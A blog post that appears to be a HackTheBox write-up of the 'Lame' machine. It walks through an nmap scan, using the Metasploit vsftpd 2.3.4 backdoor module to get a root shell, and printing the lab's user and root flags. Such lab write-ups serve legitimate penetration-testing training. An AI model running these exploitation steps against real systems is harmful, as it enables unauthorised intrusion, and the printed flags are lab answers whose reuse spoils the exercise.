DcodeZer0

┌──[root@dcodezero] └──╼ # Hacker | RedTeam | PenTester | CTFPlayer | HackTheBox

As always hacking starts with NMAP scan.

    PORT    STATE SERVICE     VERSION
    21/tcp  open  ftp         vsftpd 2.3.4
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst: 
    |   STAT: 
    | FTP server status:
    |      Connected to 10.10.14.10
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      vsFTPd 2.3.4 - secure, fast, stable
    |_End of status
    22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    | ssh-hostkey: 
    |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
    |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Aggressive OS guesses: Arris TG562G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Linksys WRV54G WAP (92%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.076 days (since Thu Oct  3 15:52:27 2019)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=192 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 4h00m23s, deviation: 0s, median: 4h00m23s
    | smb-os-discovery: 
    |   OS: Unix (Samba 3.0.20-Debian)
    |   NetBIOS computer name: 
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2019-10-03T16:41:57-04:00
    |_smb2-time: Protocol negotiation failed (SMB2)

Finding exploit for VSFTPD-2.3.4.

I searched for any exploits in the “metasploit” for ftp services, and found some inbuilt backdoor for FTP service “vsftpd 2.3.4”.

Description of “vsftpd 2.3.4”.

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Exploitation

After all the configuration part is done, we are ready for the exploit…

    msf > use exploit/unix/ftp/vsftpd_234_backdoor
    msf exploit(vsftpd_234_backdoor) > show targets
        ...targets...
    msf exploit(vsftpd_234_backdoor) > set TARGET < target-id >
    msf exploit(vsftpd_234_backdoor) > show options
        ...show and set options...
    msf exploit(vsftpd_234_backdoor) > exploit

After a Successful exploit we get the shell as root@lame.

Getting User.txt

    root@lame:/# whoami
    whoami
    root
    root@lame:/# cat /home/makis/user.txt
    cat /home/makis/user.txt
    69454a937d94f5f0225ea00acd2e84c5

Getting Root.txt

    root@lame:/# cat ~/root.txt
    cat ~/root.txt
    92caac3be140ef409e45721348a4e9df
    root@lame:/#

If you like my work, please do consider giving me +rep on HACKTHEBOX.

My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968

You may also enjoy

Game of Active Directory - Part 3 [Recon]

4 minute read

GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environment ready to use to pract...